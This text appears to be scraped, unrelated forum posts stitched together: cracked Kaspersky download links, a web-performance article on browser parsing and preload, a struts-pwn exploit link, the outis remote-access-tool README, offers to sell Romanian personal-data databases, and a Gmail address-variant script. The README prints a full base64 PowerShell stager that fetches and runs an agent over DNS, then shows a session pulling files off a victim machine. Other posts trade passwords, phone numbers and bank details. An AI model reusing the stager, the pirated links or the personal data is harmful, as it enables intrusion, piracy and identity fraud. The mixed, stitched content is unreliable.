Kaspersky Anti-Virus Internet Security Total Security 2017 17.0.0.611.0.1709.0 + Patch FiLE SiZE: 560.61 MB INFORMATION Kaspersky® delivers premium protection from viruses, Trojans, spam, hackers, and more. Its cutting-edge, hybrid approach to digital security combines innovative, cloud-based technologies with advanced antivirus protection to deliver a faster, more effective response to todayâ™s complex, ever-evolving threats. You, your private data and PC are completely protected as you work, bank, shop and play online. FEATURES : Protects your privacy, your money & your kids from Internet risks - Protects your PC against todayâ™s Internet threats - Adds extra security for online banking & shopping - Safeguards your privacy and personal information - Helps protect your children against online threats - Combines superior security & optimized performance Unique Safe Money Technology Provides additional layers of protection during financial transactions, such as online banking and shopping, and using payment systems. Innovative Hybrid Protection Combines innovative, cloud-based technologies with advanced antivirus protection to ensure youâ™re always safe from the latest threats. Identity & Privacy Safeguards Uses the latest cloud data, anti-phishing technologies and a secure keyboard mode to keep your personal data from being stolen. Dangerous Website Alerts Advises you of the safety of search result links, and blocks malicious and phishing websites. Advanced Parental Controls Helps you ensure your children are safe and responsible online while theyâ™re surfing the web, gaming and enjoying social networks. Safe Social Networking Ensures your Facebook, MySpace and Twitter accounts wonâ™t receive malicious links or software from your friends. http://rapidgator.net/file/f868c753c2a1ac63b0eb01a14e6603b2/Kaspersky_Anti_Virus_Internet_Security_Total_Security_2017_17_0_0_611_0_1709_0_Patch.rar.html http://uploadgig.com/file/download/f6daFf0cad5FdeC3/Kaspersky_Anti_Virus_Internet_Security_Total_Security_2017_17_0_0_611_0_1709_0_Patch.rar If you like my post, don't forget to say Thanks and help keep the thread alive. Thanks You!

In 2017, the toolbox for making sure your web page loads fast includes everything from minification and asset optimization to caching, CDNs, code splitting and tree shaking. However, you can get big performance boosts with just a few keywords and mindful code structuring, even if you’re not yet familiar with the concepts above and you’re not sure how to get started. The fresh web standard <link rel="preload">, that allows you to load critical resources faster, is coming to Firefox later this month. You can already try it out in Firefox Nightly or Developer Edition, and in the meantime, this is a great chance to review some fundamentals and dive deeper into performance associated with parsing the DOM. Understanding what goes on inside a browser is the most powerful tool for every web developer. We’ll look at how browsers interpret your code and how they help you load pages faster with speculative parsing. We’ll break down how defer and async work and how you can leverage the new keyword preload. Building blocks HTML describes the structure of a web page. To make any sense of the HTML, browsers first have to convert it into a format they understand – the Document Object Model, or DOM. Browser engines have a special piece of code called a parser that’s used to convert data from one format to another. An HTML parser converts data from HTML into the DOM. In HTML, nesting defines the parent-child relationships between different tags. In the DOM, objects are linked in a tree data structure capturing those relationships. Each HTML tag is represented by a node of the tree (a DOM node). The browser builds up the DOM bit by bit. As soon as the first chunks of code come in, it starts parsing the HTML, adding nodes to the tree structure. The DOM has two roles: it is the object representation of the HTML document, and it acts as an interface connecting the page to the outside world, like JavaScript. When you call document.getElementById(), the element that is returned is a DOM node. Each DOM node has many functions you can use to access and change it, and what the user sees changes accordingly. CSS styles found on a web page are mapped onto the CSSOM – the CSS Object Model. It is much like the DOM, but for the CSS rather than the HTML. Unlike the DOM, it cannot be built incrementally. Because CSS rules can override each other, the browser engine has to do complex calculations to figure out how the CSS code applies to the DOM. The history of the <script> tag As the browser is constructing the DOM, if it comes across a <script>...</script> tag in the HTML, it must execute it right away. If the script is external, it has to download the script first. Back in the old days, in order to execute a script, parsing had to be paused. It would only start up again after the JavaScript engine had executed code from a script. Why did the parsing have to stop? Well, scripts can change both the HTML and its product―the DOM. Scripts can change the DOM structure by adding nodes with document.createElement(). To change the HTML, scripts can add content with the notorious document.write() function. It’s notorious because it can change the HTML in ways that can affect further parsing. For example, the function could insert an opening comment tag making the rest of the HTML invalid. Scripts can also query something about the DOM, and if that happens while the DOM is still being constructed, it could return unexpected results. document.write() is a legacy function that can break your page in unexpected ways and you shouldn’t use it, even though browsers still support it. For these reasons, browsers have developed sophisticated techniques to get around the performance issues caused by script blocking that I will explain shortly. What about CSS? JavaScript blocks parsing because it can modify the document. CSS can’t modify the document, so it seems like there is no reason for it to block parsing, right? However, what if a script asks for style information that hasn’t been parsed yet? The browser doesn’t know what the script is about to execute—it may ask for something like the DOM node’s background-color which depends on the style sheet, or it may expect to access the CSSOM directly. Because of this, CSS may block parsing depending on the order of external style sheets and scripts in the document. If there are external style sheets placed before scripts in the document, the construction of DOM and CSSOM objects can interfere with each other. When the parser gets to a script tag, DOM construction cannot proceed until the JavaScript finishes executing, and the JavaScript cannot be executed until the CSS is downloaded, parsed, and the CSSOM is available. Another thing to keep in mind is that even if the CSS doesn’t block DOM construction, it blocks rendering. The browser won’t display anything until it has both the DOM and the CSSOM. This is because pages without CSS are often unusable. If a browser showed you a messy page without CSS, then a few moments later snapped into a styled page, the shifting content and sudden visual changes would make a turbulent user experience. See the Pen <a href="https://codepen.io/micikato/pen/JroPNm/">Flash of Unstyled Content</a> by Milica (<a href="https://codepen.io/micikato">@micikato</a>) on <a href="https://codepen.io">CodePen</a>.<br /> That poor user experience has a name – Flash of Unstyled Content or FOUC To get around these issues, you should aim to deliver the CSS as soon as possible. Recall the popular “styles at the top, scripts at the bottom” best practice? Now you know why it was there! Back to the future – speculative parsing Pausing the parser whenever a script is encountered means that every script you load delays the discovery of the rest of the resources that were linked in the HTML. If you have a few scripts and images to load, for example– <script src="slider.js"></script> <script src="animate.js"></script> <script src="cookie.js"></script> <img src="slide1.png"> <img src="slide2.png"> –the process used to go like this: That changed around 2008 when IE introduced something they called “the lookahead downloader”. It was a way to keep downloading the files that were needed while the synchronous script was being executed. Firefox, Chrome and Safari soon followed, and today most browsers use this technique under different names. Chrome and Safari have “the preload scanner” and Firefox – the speculative parser. The idea is: even though it’s not safe to build the DOM while executing a script, you can still parse the HTML to see what other resources need to be retrieved. Discovered files are added to a list and start downloading in the background on parallel connections. By the time the script finishes executing, the files may have already been downloaded. The waterfall chart for the example above now looks more like this: The download requests triggered this way are called “speculative” because it is still possible that the script could change the HTML structure (remember document.write ?), resulting in wasted guesswork. While this is possible, it is not common, and that’s why speculative parsing still gives big performance improvements. While other browsers only preload linked resources this way, in Firefox the HTML parser also runs the DOM tree construction algorithm speculatively. The upside is that when a speculation succeeds, there’s no need to re-parse a part of the file to actually compose the DOM. The downside is that there’s more work lost if and when the speculation fails. (Pre)loading stuff This manner of resource loading delivers a significant performance boost, and you don’t need to do anything special to take advantage of it. However, as a web developer, knowing how speculative parsing works can help you get the most out of it. The set of things that can be preloaded varies between browsers. All major browsers preload: scripts external CSS and images from the <img> tag Firefox also preloads the poster attribute of video elements, while Chrome and Safari preload @import rules from inlined styles. There are limits to how many files a browser can download in parallel. The limits vary between browsers and depend on many factors, like whether you’re downloading all files from one or from several different servers and whether you are using HTTP/1.1 or HTTP/2 protocol. To render the page as quickly as possible, browsers optimize downloads by assigning priority to each file. To figure out these priorities, they follow complex schemes based on resource type, position in the markup, and progress of the page rendering. While doing speculative parsing, the browser does not execute inline JavaScript blocks. This means that it won’t discover any script-injected resources, and those will likely be last in line in the fetching queue. var script = document.createElement('script'); script.src = "//somehost.com/widget.js"; document.getElementsByTagName('head')[0].appendChild(script); You should make it easy for the browser to access important resources as soon as possible. You can either put them in HTML tags or include the loading script inline and early in the document. However, sometimes you want some resources to load later because they are less important. In that case, you can hide them from the speculative parser by loading them with JavaScript late in the document. You can also check out this MDN guide on how to optimize your pages for speculative parsing. defer and async Still, synchronous scripts blocking the parser remains an issue. And not all scripts are equally important for the user experience, such as those for tracking and analytics. Solution? Make it possible to load these less important scripts asynchronously. The defer and async attributes were introduced to give developers a way to tell the browser which scripts to handle asynchronously. Both of these attributes tell the browser that it may go on parsing the HTML while loading the script “in background”, and then execute the script after it loads. This way, script downloads don’t block DOM construction and page rendering. Result: the user can see the page before all scripts have finished loading. The difference between defer and async is which moment they start executing the scripts. defer was introduced before async. Its execution starts after parsing is completely finished, but before the DOMContentLoaded event. It guarantees scripts will be executed in the order they appear in the HTML and will not block the parser. async scripts execute at the first opportunity after they finish downloading and before the window’s load event. This means it’s possible (and likely) that async scripts are not executed in the order in which they appear in the HTML. It also means they can interrupt DOM building. Wherever they are specified, async scripts load at a low priority. They often load after all other scripts, without blocking DOM building. However, if an async script finishes downloading sooner, its execution can block DOM building and all synchronous scripts that finish downloading afterwards. Note: Attributes async and defer work only for external scripts. They are ignored if there’s no src. preload async and defer are great if you want to put off handling some scripts, but what about stuff on your web page that’s critical for user experience? Speculative parsers are handy, but they preload only a handful of resource types and follow their own logic. The general goal is to deliver CSS first because it blocks rendering. Synchronous scripts will always have higher priority than asynchronous. Images visible within the viewport should be downloaded before those below the fold. And there are also fonts, videos, SVGs… In short – it’s complicated. As an author, you know which resources are the most important for rendering your page. Some of them are often buried in CSS or scripts and it can take the browser quite a while before it even discovers them. For those important resources you can now use <link rel="preload"> to communicate to the browser that you want to load them as soon as possible. All you need to write is: <link rel="preload" href="very_important.js" as="script"> You can link pretty much anything and the as attribute tells the browser what it will be downloading. Some of the possible values are: script style image font audio video You can check out the rest of the content types on MDN. Fonts are probably the most important thing that gets hidden in the CSS. They are critical for rendering the text on the page, but they don’t get loaded until browser is sure that they are going to be used. That check happens only after CSS has been parsed, and applied, and the browser has matched CSS rules to the DOM nodes. This happens fairly late in the page loading process and it often results in an unnecessary delay in text rendering. You can avoid it by using the preload attribute when you link fonts. One thing to pay attention to when preloading fonts is that you also have to set the crossorigin attribute even if the font is on the same domain: <link rel="preload" href="font.woff" as="font" crossorigin> The preload feature has limited support at the moment as the browsers are still rolling it out, but you can check the progress here. Conclusion Browsers are complex beasts that have been evolving since the 90s. We’ve covered some of the quirks from that legacy and some of the newest standards in web development. Writing your code with these guidelines will help you pick the best strategies for delivering a smooth browsing experience. Source

A inceput sezonu ?

https://github.com/mazen160/struts-pwn

Ai doar email-urile sau si alte informatii suplimentare ? Daca ai si alte informatii suplimentare gen nr de telefon, nume, si oras, si daca da , persoanele respective si-au dat acceptul pt comercializarea lor ? daca ai doar 13k de emailuri pretul este unul exagerat ? apropo de ce tara sunt email-urile ?

Nice challenge si mersi de urari @Silviu Frumoasa postare (si fain challenge @Usr6)

Felicitari. Nu mi-a trecut prin cap sa caut pe Google the code of holy bible. Also, poti extrage foarte usor arhivele din poze folosind binwalk. Doar aveti grija ca e cam entuziast si le si dezarhiveaza si cand sunt parolate, rezultand intr-un mic fiasco uneori.

outis outis is a custom Remote Administration Tool (RAT) or something like that. Think Meterpreter or Empire-Agent. However, the focus of this tool is neither an exploit toolkit (there are no exploits) nor persistent management of targets. The focus is to communicate between server and target system and to transfer files, share sockets, spawn shells and so on using various methods and platforms. On the Name The cyclops Polyphemus in Homer's Odyssey had some issues with name resolution. When he asked for Odysseus' name, the hacker told him it is "Outis" meaning "Nobody" in ancient Greek. Thus, when Polyphemus later shouted, that Nobody was about to kill him, strangly no help arrived. My thanks to Marcel for remembering this marvelous piece of classic tale. Dependencies for the Handler Archlinux users can install the following packages: python3 # includes cmd, tempfile, ... python-progressbar2 python-dnspython python-crypto python-pyopenssl and maybe more... In other distributions the names may differ, for instance, there is a module named crypto and a module named pycrypto. We need the latter. Also, older versions might cause problems: pyopenssl needs to be version 16.1.0 or newer, check as follows: $ python3 -c 'import OpenSSL; print(OpenSSL.version.__version__)' You can set up a python virtual environment quite easily: $ virtualenv outis-venv $ source ./outis-venv/bin/activate (outis-venv) $ pip install progressbar2 dnspython pycrypto pyopenssl This results to the following package list, which seems to work for me: $ pip freeze appdirs==1.4.3 asn1crypto==0.22.0 cffi==1.10.0 cryptography==1.8.1 dnspython==1.15.0 idna==2.5 packaging==16.8 progressbar2==3.18.1 pycparser==2.17 pycrypto==2.6.1 pyOpenSSL==16.2.0 pyparsing==2.2.0 python-utils==2.1.0 six==1.10.0 Installation Clone this git with recursive flag to also clone its submodules in the thirdpartytools folder git clone --recursive ... The handler runs on Python 3. Install its dependencies and run it. It will generate stagers, agents and everything else for you. To bind low ports without needing root privileges, consider using a capability wrapper. Terms agent: software, that runs on the victim system handler: software, that parses your commands and leads the agents (usually it runs on your server) stager: short script that downloads the agent (using the transport module) and runs it transport: communication channel between stager/agent and handler, e.g. ReverseTCP platform: victim architecture to use for stager/agent scripts, e.g. PowerShell Currently Supported Plattforms PowerShell (partial) Currently Supported Transports Reverse TCP DNS (types TXT or A for staging, and types TXT, CNAME, MX, AAAA or A for agent connection) Currently Supported Cryptography Agent stages can be encoded (for obfuscation, not for security) using cyclic XOR Agent stages can be authenticated using RSA signatures and pinned certificates Transport connections can be encrypted / authenticated using TLS and pinned certificates Currently Supported Commands and Controls ping requests to test the connection (partial) text message format (partial) upload and download of files Currently Supported Extras When using DNS transport with stager and powershell, you can stage the tool dnscat2 / dnscat2-powershell from the thirdpartytools directory instead of the default outis agent. Set the platform option AGENTTYPE to DNSCAT2 (will take a while, but uses only DNS to stage) or DNSCAT2DOWNLOADER (tries to download using HTTPS). Usage Examples Download of a file using staged DNS transport with POWERSHELL platform could look like this: $ outis outis> set TRANSPORT DNS outis> set ZONE zfs.sy.gs outis> set AGENTDEBUG TRUE outis> info [+] Options for the Handler: Name Value Required Description ----------------- ---------- -------- ----------------------------------------------------------------- TRANSPORT DNS True Communication way between agent and handler (Options: REVERSETCP, DNS) CHANNELENCRYPTION TLS True Encryption Protocol in the transport (Options: NONE, TLS) PLATFORM POWERSHELL True Platform of agent code (Options: POWERSHELL) PROGRESSBAR TRUE True Display a progressbar for uploading / downloading? (only if not debugging the relevant module) (Options: TRUE, FALSE) [+] Options for the TRANSPORT module DNS: Name Value Required Description --------- ----------- -------- ------------------------------------------------------------------------ ZONE zfs.sy.gs True DNS Zone for handling requests LHOST 0.0.0.0 True Interface IP to listen on LPORT 53 True UDP-Port to listen on for DNS server DNSTYPE TXT True DNS type to use for the connection (stager only, the agent will enumerate all supported types on its own) (Options: TXT, A) DNSSERVER False IP address of DNS server to connect for all queries [+] Options for the PLATFORM module POWERSHELL: Name Value Required Description -------------------- -------------------------- -------- ---------------------------------------------- STAGED TRUE True Is the communication setup staged or not? (Options: TRUE, FALSE) STAGEENCODING TRUE True Should we send the staged agent in an encoded form (obscurity, not for security!) (Options: TRUE, FALSE) STAGEAUTHENTICATION TRUE True Should the stager verify the agent code before executing (RSA signature verification with certificate pinning) (Options: TRUE, FALSE) STAGECERTIFICATEFILE $TOOLPATH/data/outis.pem False File path of a PEM with both RSA key and certificate to sign and verify staged agent with (you can generate a selfsigned cert by using the script gencert.sh initially) AGENTTYPE DEFAULT True Defines which agent should be used (the default outis agent for this plattform, or some third party software we support) (Options: DEFAULT, DNSCAT2, DNSCAT2DOWNLOADER) TIMEOUT 9 True Number of seconds to wait for each request (currently only supported by DNS stagers) RETRIES 2 True Retry each request for this number of times (currently only supported by DNS stagers) AGENTDEBUG TRUE True Should the agent print and log debug messages (Options: TRUE, FALSE) outis> generatestager [+] Use the following stager code: powershell.exe -Enc JAByAD0ARwBlAHQALQBSAGEAbgBkAG8AbQA7ACQAYQA9ACIAIgA7ACQAdAA9ADAAOwBmAG8AcgAoACQAaQA9ADAAOwA7 ACQAaQArACsAKQB7ACQAYwA9ACgAWwBzAHQAcgBpAG4AZwBdACgASQBFAFgAIAAiAG4AcwBsAG8AbwBrAHUAcAAgAC0AdAB5AHAAZQA9AFQAWA BUACAALQB0AGkAbQBlAG8AdQB0AD0AOQAgAHMAJAAoACQAaQApAHIAJAAoACQAcgApAC4AegBmAHMALgBzAHkALgBnAHMALgAgACIAKQApAC4A UwBwAGwAaQB0ACgAJwAiACcAKQBbADEAXQA7AGkAZgAoACEAJABjACkAewBpAGYAKAAkAHQAKwArAC0AbAB0ADIAKQB7ACQAaQAtAC0AOwBjAG 8AbgB0AGkAbgB1AGUAOwB9AGIAcgBlAGEAawA7AH0AJAB0AD0AMAA7ACQAYQArAD0AJABjADsAfQAkAGEAPQBbAEMAbwBuAHYAZQByAHQAXQA6 ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYQApADsAJABiAD0AJABhAC4ATABlAG4AZwB0AGgAOwAkAGYAcAA9ACIAWA B4AEkAMgArAGUAQgBoAGUAUgBMAFMATQBuAHIAVQBNAFgAbgBnAHIARABTAGQATwAyAGQAOAAwAGMAZAB2AHcAcwBKAGMAYwBGAEIAbgAvAGYA LwB3AEoATwBpAEIAVAA4AGIATwA2AHAAZgBXAFgAdwBwAEUATwBQAFAAUgBsAFAAdgBnAE8AbgBlAGcAYwBpAE8AYgBPAGEAZABOAFAAVQBxAH AAZgBRAD0APQAiADsAJABpAD0AMAA7ACQAYQA9ACQAYQB8ACUAewAkAF8ALQBiAFgAbwByACQAZgBwAFsAJABpACsAKwAlACQAZgBwAC4ATABl AG4AZwB0AGgAXQB9ADsAJABwAGsAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAAwACwANwA1ADUAKQA7ACQAcw BpAGcAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAA3ADUANQAsADYAOAA0ACkAOwAkAHMAPQBOAGUAdwAtAE8A YgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAAxADQAMwA5ACwAKAAkAGIALQAxADQAMwA5ACkAKQA7ACQAcwBoAGEAPQBOAGUAdwAtAE 8AYgBqAGUAYwB0ACAAUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBTAEgAQQA1ADEAMgBNAGEAbgBhAGcAZQBk ADsAaQBmACgAQAAoAEMAbwBtAHAAYQByAGUALQBPAGIAagBlAGMAdAAgACQAcwBoAGEALgBDAG8AbQBwAHUAdABlAEgAYQBzAGgAKAAkAHAAaw AuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAKQAgACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIA aQBuAGcAKAAkAGYAcAApACkAIAAtAFMAeQBuAGMAVwBpAG4AZABvAHcAIAAwACkALgBMAGUAbgBnAHQAaAAgAC0AbgBlACAAMAApAHsAIgBFAF IAUgBPAFIAMQAiADsARQB4AGkAdAAoADEAKQB9ADsAJAB4AD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5 AHAAdABvAGcAcgBhAHAAaAB5AC4AUgBTAEEAQwByAHkAcAB0AG8AUwBlAHIAdgBpAGMAZQBQAHIAbwB2AGkAZABlAHIAOwAkAHgALgBGAHIAbw BtAFgAbQBsAFMAdAByAGkAbgBnACgAJABwAGsAKQA7AGkAZgAoAC0ATgBvAHQAIAAkAHgALgBWAGUAcgBpAGYAeQBEAGEAdABhACgAJABzAC4A VABvAEMAaABhAHIAQQByAHIAYQB5ACgAKQAsACIAUwBIAEEANQAxADIAIgAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG UANgA0AFMAdAByAGkAbgBnACgAJABzAGkAZwApACkAKQB7ACIARQBSAFIATwBSADIAIgA7AEUAeABpAHQAKAAyACkAfQA7ACIARwBPAEEARwBF AE4AVAAiADsASQBFAFgAIAAkAHMAOwA= outis> run [+] DNS listening on 0.0.0.0:53 [+] Sending staged agent (34332 bytes)... 100% (184 of 184) |########################################################| Elapsed Time: 0:00:16 Time: 0:00:16 [+] Staging done [+] Waiting for connection and TLS handshake... [+] Initial connection with new agent started [+] Upgrade to TLS done outis session> [+] AGENT: Hello from Agent outis session> download C:\testfile.txt /tmp/out.txt [+] initiating download of remote file C:\testfile.txt to local file /tmp/out.txt [+] agent reports a size of 3295 bytes for channel 1 100% (3295 of 3295) |######################################################| Elapsed Time: 0:00:00 Time: 0:00:00 [+] wrote 3295 bytes to file /tmp/out.txt outis session> exit Do you really want to exit the session and close the connection [y/N]? y outis> exit Or maybe we want to use dnscat2 for the real deal and just use outis to stage it: $ outis outis> set TRANSPORT DNS outis> set AGENTTYPE DNSCAT2 outis> set ZONE zfs.sy.gs outis> run [+] DNS listening on 0.0.0.0:53 [+] Sending staged agent (406569 bytes)... 100% (2185 of 2185) |#######################################################| Elapsed Time: 0:01:17 Time: 0:01:17 [+] Staging done [+] Starting dnscat2 to handle the real connection New window created: 0 New window created: crypto-debug Welcome to dnscat2! Some documentation may be out of date. auto_attach => false history_size (for new windows) => 1000 Security policy changed: All connections must be encrypted and authenticated New window created: dns1 Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = zfs.sy.gs]... Assuming you have an authoritative DNS server, you can run the client anywhere with the following (--secret is optional): ./dnscat --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg== zfs.sy.gs To talk directly to the server without a domain name, run: ./dnscat --dns server=x.x.x.x,port=53 --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg== Of course, you have to figure out <server> yourself! Clients will connect directly on UDP port 53. dnscat2> New window created: 1 Session 1 Security: ENCRYPTED AND VERIFIED! (the security depends on the strength of your pre-shared secret!) dnscat2> sessions 0 :: main [active] crypto-debug :: Debug window for crypto stuff [*] dns1 :: DNS Driver running on 0.0.0.0:53 domains = zfs.sy.gs [*] 1 :: command (feynman-win7) [encrypted and verified] [*] dnscat2> session -i 1 New window created: 1 history_size (session) => 1000 Session 1 Security: ENCRYPTED AND VERIFIED! (the security depends on the strength of your pre-shared secret!) This is a command session! That means you can enter a dnscat2 command such as 'ping'! For a full list of clients, try 'help'. command (feynman-win7) 1> download c:/testfile.txt /tmp/out.txt Attempting to download c:/testfile.txt to /tmp/out.txt Wrote 3295 bytes from c:/testfile.txt to /tmp/out.txt! command (feynman-win7) 1> exit Input thread is over Inspirations This project was inspired by (and shamelessly stole part of its code from): Empire: - https://github.com/adaptivethreat/Empire/blob/master/lib/common/stagers.py — generate_launcher uses a HTTP(S) stager - https://github.com/adaptivethreat/Empire/tree/master/data/agent — stager (step two after initial launcher) and agent (step three) - https://github.com/EmpireProject/Empire/blob/master/lib/common/helpers.py — powershell script generation and stipping Metasploit: - https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/cmdstager.rb — CmdStager for bourne, ... ReflectiveDLLInjection: - https://github.com/stephenfewer/ReflectiveDLLInjection p0wnedShell: - https://github.com/Cn33liz/p0wnedShell — some ideas for AMSI evation for future use dnscat2: - https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md — ideas on protocol design over DNS - https://github.com/lukebaggett/dnscat2-powershell/blob/master/dnscat2.ps1 — powershell version of the dnscat2 agent dnsftp - https://github.com/breenmachine/dnsftp — short script parts for stagers via DNS Disclaimer Use at your own risk. Do not use without full consent of everyone involved. For educational purposes only. Download outis-master.zip or git clone https://github.com/SySS-Research/outis.git Source: https://github.com/SySS-Research/outis

Salut , Mai este cineva interesat de o baza de date persoane fizice romania ? (Baza de date contine , nume , prenume ,adrese , adrese de mail , numere de telefon ,etc ) Mai multe detali in PM ! Multumesc !

Gmail oferă posibilitatea de a avea adresa personală cu punct sau fără (mai multe info aici). Prin scriptul următor se pot genera toate combinaţiile posibile pentru un ID dat. <?php /* Generate all combinations for a gmail username Author: Dragos <dragos@interinfo.ro> */ $input = "person"; $emails = generate_gmail($input); foreach($emails as $email) echo $email . "\n"; function generate_gmail($string) { $chars = str_split($string); $input = array(); for($i=0;$i<count($chars)-1;$i++) $input[] = array($chars[$i], $chars[$i] . "."); $input[] = array($chars[count($chars)-1]); $result = array(); foreach ($input as $key => $values) { if (empty($values)) continue; if (empty($result)) { foreach($values as $value) $result[] = array($key => $value); }else{ $append = array(); foreach($result as &$product) { $product[$key] = array_shift($values); $copy = $product; foreach($values as $item) { $copy[$key] = $item; $append[] = $copy; } array_unshift($values, $product[$key]); } $result = array_merge($result, $append); } } $final = array(); foreach($result as $res) $final[] = implode("",$res) . "@gmail.com"; return $final; }

Dap ți-am dat pm

Kaspersky Internet Security 2017 v17.0.0.611 + 360 Days Core-X FiLE SiZE: 170.45 MB INFORMATION Kaspersky Internet Security delivers premium protection for you, your PC, your money and your family. Advanced security technologies protect against viruses & web-based threats, while also safeguarding your identity and adding extra layers of security when youâ™re online banking or shopping. SCREENSHOTS 1 LiNKS | Part 1 GB | NO CRC | NO PASS http://rapidgator.net/file/398cb7022840833b7f3619b912dd6a1c/Kaspersky_Internet_Security_2017_v17_0_0_611_360_Days_Core_X.rar.html If you like my post, don't forget to say Thanks and help keep the thread alive. Thanks You!

Salut Vand baza de date . Contine doar persoane din romania 8k baza de date contine urmatoarele informati : id ,C#P ,tip ,pass ,tara ,bloc ,etaj ,nume ,tel1 ,tel2 ,email ,numar, ,judet ,retur ,scara ,pass_n ,adresa ,strada ,prenume ,username , discount, numefirma ,codfiscal ,localitate ,apartament ,cont_ba##a ,cod_postal

Great guide. I worked with 1 niche only. $400 so far. Say thanks... Proof [hide] https://www.mediafire.com/file/otk1rjawtirjfn3/Brisk Commissioner.pdf http://www75.zippyshare.com/v/vE0mS12K/file.html https://www.virustotal.com/#/file/3bbd9967336f3d11708d1ae1382556b6cb8acb939a7f4feb47d4da62a5c3f3f5/detection [/hide]